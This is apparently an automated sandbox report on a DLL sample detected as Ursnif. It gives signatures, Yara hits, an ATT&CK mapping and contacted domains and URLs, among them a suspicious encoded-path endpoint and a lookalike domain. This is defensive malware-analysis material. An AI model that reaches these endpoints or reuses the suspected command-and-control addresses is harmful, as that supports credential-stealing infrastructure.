            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_011293D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_011293D5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0040179C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_0040179C

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.603390107.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270930873.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270911726.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270883574.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5664, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.270922495.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270853129.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270899623.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270776978.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270748296.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.603390107.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270930873.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270911726.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.270883574.0000000005648000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5664, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 330536 Sample: statis1c.dll Startdate: 15/12/2020 Architecture: WINDOWS Score: 76 25 gstatici.com 2->25 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected  Ursnif 2->39 41 Machine Learning detection for sample 2->41 43 PE file has nameless sections 2->43 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 regsvr32.exe 9->11         started        14 cmd.exe 1 9->14         started        signatures6 45 Writes or reads registry keys via WMI 11->45 47 Writes registry values via WMI 11->47 49 Creates a COM Internet Explorer object 11->49 16 iexplore.exe 1 61 14->16         started        process7 process8 18 iexplore.exe 151 16->18         started        21 iexplore.exe 25 16->21         started        23 iexplore.exe 29 16->23         started        dnsIp9 27 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49742, 49743 FASTLYUS United States 18->27 29 www.msn.com 18->29 35 7 other IPs or domains 18->35 31 ocsp.sca1b.amazontrust.com 65.9.70.182, 49756, 49757, 80 AMAZON-02US United States 21->31 33 192.168.2.1 unknown unknown 23->33

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            statis1c.dll12%VirustotalBrowse
            statis1c.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.regsvr32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            1.2.regsvr32.exe.1120000.4.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            tls13.taboola.map.fastly.net0%VirustotalBrowse
            ocsp.sca1b.amazontrust.com0%VirustotalBrowse
            gstatici.com0%VirustotalBrowse
            img.img-taboola.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            http://ocsp.sca1b.amazontrust.com/images/_2BGeSkvWMHh/BUynXFpIFo3/59SKHc0FAlUbbS/AAtvmEP6bSxngBIQxSpAq/spVOjE6SRSYYM_2B/1kssSPGZE9BGerK/aySQiowSzRMTuPb2VY/iGbL_2FuQ/kIutS_2BJ_2FiHpi94lZ/RSri6_2BC0CK8ZJ8hbj/y5F3ZxB7PT1kx7tzJMiZB9/E_2Bs_2BXabKH/oLNRmzX7_2BipXb_2B/zagb.avi0%Avira URL Cloudsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            104.84.56.24
            truefalse
              high
              tls13.taboola.map.fastly.net
              151.101.1.44
              truefalseunknown
              ocsp.sca1b.amazontrust.com
              65.9.70.182
              truefalseunknown
              hblg.media.net
              104.84.56.24
              truefalse
                high
                lg3.media.net
                104.84.56.24
                truefalse
                  high
                  gstatici.com
                  195.110.58.176
                  truefalseunknown
                  web.vortex.data.msn.com
                  unknown
                  unknownfalse
                    high
                    www.msn.com
                    unknown
                    unknownfalse
                      high
                      srtb.msn.com
                      unknown
                      unknownfalse
                        high
                        img.img-taboola.com
                        unknown
                        unknownfalseunknown
                        cvision.media.net
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ocsp.sca1b.amazontrust.com/images/_2BGeSkvWMHh/BUynXFpIFo3/59SKHc0FAlUbbS/AAtvmEP6bSxngBIQxSpAq/spVOjE6SRSYYM_2B/1kssSPGZE9BGerK/aySQiowSzRMTuPb2VY/iGbL_2FuQ/kIutS_2BJ_2FiHpi94lZ/RSri6_2BC0CK8ZJ8hbj/y5F3ZxB7PT1kx7tzJMiZB9/E_2Bs_2BXabKH/oLNRmzX7_2BipXb_2B/zagb.avifalse
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://searchads.msn.net/.cfm?&&kp=1&{4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drfalse
                            high
                            https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.4.drfalse
                              high
                              https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.4.drfalse
                                high
                                https://www.remixd.com/privacy_policy.htmliab2Data[1].json.4.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://onedrive.live.com;Fotos85-0f8009-68ddb2ab[1].js.4.drfalse
                                • Avira URL Cloud: safe
                                low
                                https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.4.drfalse
                                  high
                                  https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel85-0f8009-68ddb2ab[1].js.4.drfalse
                                    high
                                    http://ogp.me/ns/fb#de-ch[1].htm.4.drfalse
                                      high
                                      https://www.msn.com/de-ch/news/other/der-sp-vielflieger-und-2-minuten-schneller-arbeiten/ar-BB1bVrEJde-ch[1].htm.4.drfalse
                                        high
                                        https://outlook.live.com/mail/deeplink/compose;Kalender85-0f8009-68ddb2ab[1].js.4.drfalse
                                          high
                                          https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drfalse
                                            high
                                            https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.4.drfalse
                                              high
                                              https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn85-0f8009-68ddb2ab[1].js.4.drfalse
                                                high
                                                https://web.vortex.data.msn.com/collect/v1de-ch[1].htm.4.drfalse
                                                  high
                                                  https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_sitede-ch[1].htm.4.drfalse
                                                    high
                                                    https://www.skype.com/de-ch[1].htm.4.drfalse
                                                      high
                                                      https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.4.drfalse
                                                        high
                                                        https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.4.drfalse
                                                          high
                                                          https://onedrive.live.com/?qt=allmyphotos;Aktuelle85-0f8009-68ddb2ab[1].js.4.drfalse
                                                            high
                                                            https://www.msn.com/de-ch/news/other/obergericht-muss-strafe-f%c3%bcr-milchbuck-pr%c3%bcgler-neu-besde-ch[1].htm.4.drfalse
                                                              high
                                                              https://amzn.to/2TTxhNgde-ch[1].htm.4.drfalse
                                                                high
                                                                https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                  high
                                                                  https://client-s.gateway.messenger.live.com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                    high
                                                                    https://www.brightcom.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                      high
                                                                      https://www.msn.com/de-ch/de-ch[1].htm.4.drfalse
                                                                        high
                                                                        https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                          high
                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1{4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drfalse
                                                                            high
                                                                            https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.4.drfalse
                                                                              high
                                                                              https://bealion.com/politica-de-cookiesiab2Data[1].json.4.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.msn.com/de-chde-ch[1].htm.4.drfalse
                                                                                high
                                                                                https://twitter.com/i/notifications;Ich85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                  high
                                                                                  https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.4.drfalse
                                                                                    high
                                                                                    https://www.gadsme.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=dech-shoppingstride-ch[1].htm.4.drfalse
                                                                                      high
                                                                                      https://portal.eu.numbereight.me/policies-license#software-privacy-noticeiab2Data[1].json.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.4.drfalse
                                                                                        high
                                                                                        https://www.msn.com/de-ch/news/other/und-pl%c3%b6tzlich-steht-da-ein-neuer-brunnen/ar-BB1bUYmF?ocid=de-ch[1].htm.4.drfalse
                                                                                          high
                                                                                          https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                            high
                                                                                            https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.4.drfalse
                                                                                              high
                                                                                              http://ogp.me/ns#de-ch[1].htm.4.drfalse
                                                                                                high
                                                                                                https://docs.prebid.org/privacy.htmliab2Data[1].json.4.drfalse
                                                                                                  high
                                                                                                  https://www.msn.com/de-ch/news/other/ein-dieb-dringt-in-z%c3%bcrich-mehrfach-in-hauseing%c3%a4nge-eide-ch[1].htm.4.drfalse
                                                                                                    high
                                                                                                    https://onedrive.live.com/?qt=mru;OneDrive-App85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                      high
                                                                                                      https://www.skype.com/de85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                        high
                                                                                                        https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.4.drfalse
                                                                                                          high
                                                                                                          https://www.skype.com/de/download-skype85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                            high
                                                                                                            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downliab2Data[1].json.4.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://clkde.tradedoubler.com/click?p=235514&amp;a=3064090&amp;g=24888006&amp;epi=dech-shoppingstride-ch[1].htm.4.drfalse
                                                                                                              high
                                                                                                              https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.4.drfalse
                                                                                                                high
                                                                                                                http://www.hotmail.msn.com/pii/ReadOutlookEmail/85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                  high
                                                                                                                  https://channelpilot.co.uk/privacy-policyiab2Data[1].json.4.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://onedrive.live.com;OneDrive-App85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  low
                                                                                                                  https://www.msn.com/de-ch/news/other/autofahrer-f%c3%a4hrt-fussg%c3%a4ngerin-an-sie-stirbt-noch-an-ude-ch[1].htm.4.drfalse
                                                                                                                    high
                                                                                                                    https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                      high
                                                                                                                      https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=185-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                        high
                                                                                                                        https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                          high
                                                                                                                          https://www.admo.tv/en/privacy-policyiab2Data[1].json.4.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPathiab2Data[1].json.4.drfalse
                                                                                                                            high
                                                                                                                            https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                              high
                                                                                                                              https://outlook.com/de-ch[1].htm.4.drfalse
                                                                                                                                high
                                                                                                                                https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862de-ch[1].htm.4.drfalse
                                                                                                                                  high
                                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2{4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.4.drfalse
                                                                                                                                        high
                                                                                                                                        https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                                          high
                                                                                                                                          https://onedrive.live.com/?qt=mru;Aktuelle85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.msn.com/de-ch/?ocid=iehp{4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drfalse
                                                                                                                                              high
                                                                                                                                              https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.4.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.4.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.4.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.msn.com/de-ch/news/other/sie-r%c3%a4t-zu-frischer-luft-und-dureschnufe/ar-BB1bVWZ8?ocid=de-ch[1].htm.4.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.4.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.bidstack.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://onedrive.live.com/about/en/download/85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://popup.taboola.com/germanauction[1].htm.4.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://listonic.com/privacy/iab2Data[1].json.4.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.4.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://twitter.com/de-ch[1].htm.4.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://quantyoo.de/datenschutziab2Data[1].json.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.msn.com/de-ch/news/other/pr%c3%bcgler-kritisiert-strafmass-zu-recht/ar-BB1bUOOz?ocid=hplde-ch[1].htm.4.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://outlook.live.com/calendar85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.msn.com/de-ch/news/other/ist-ein-semmeli-frisch-mit-b%c3%bcndnerfleisch-belegt-darf-es-sde-ch[1].htm.4.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=dechde-ch[1].htm.4.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.4.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://onedrive.live.com/#qt=mru85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;apauction[1].htm.4.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.msn.com/de-ch/news/other/mehr-karton-mehr-glas-aber-weniger-papier-die-neue-normalit%c3%de-ch[1].htm.4.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.4.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdfiab2Data[1].json.4.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://support.skype.com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.4.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1{4B16642F-3EEF-11EB-90E5-ECF4BB570DC9}.dat.3.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656de-ch[1].htm.4.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;httpde-ch[1].htm.4.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utmde-ch[1].htm.4.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://related.hu/adatkezeles/iab2Data[1].json.4.drfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-kantonsrat-beschliesst-im-eiltempo-ein-erstes-de-ch[1].htm.4.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://login.skype.com/login/oauth/microsoft?client_id=73813385-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                                high

                                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                Public

                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                65.9.70.182
                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                151.101.1.44
                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                54113FASTLYUSfalse

                                                                                                                                                                                                Private

                                                                                                                                                                                                IP
                                                                                                                                                                                                192.168.2.1

                                                                                                                                                                                                General Information

                                                                                                                                                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                                                Analysis ID:330536
                                                                                                                                                                                                Start date:15.12.2020
                                                                                                                                                                                                Start time:08:04:16
                                                                                                                                                                                                Joe Sandbox Product:CloudBasic
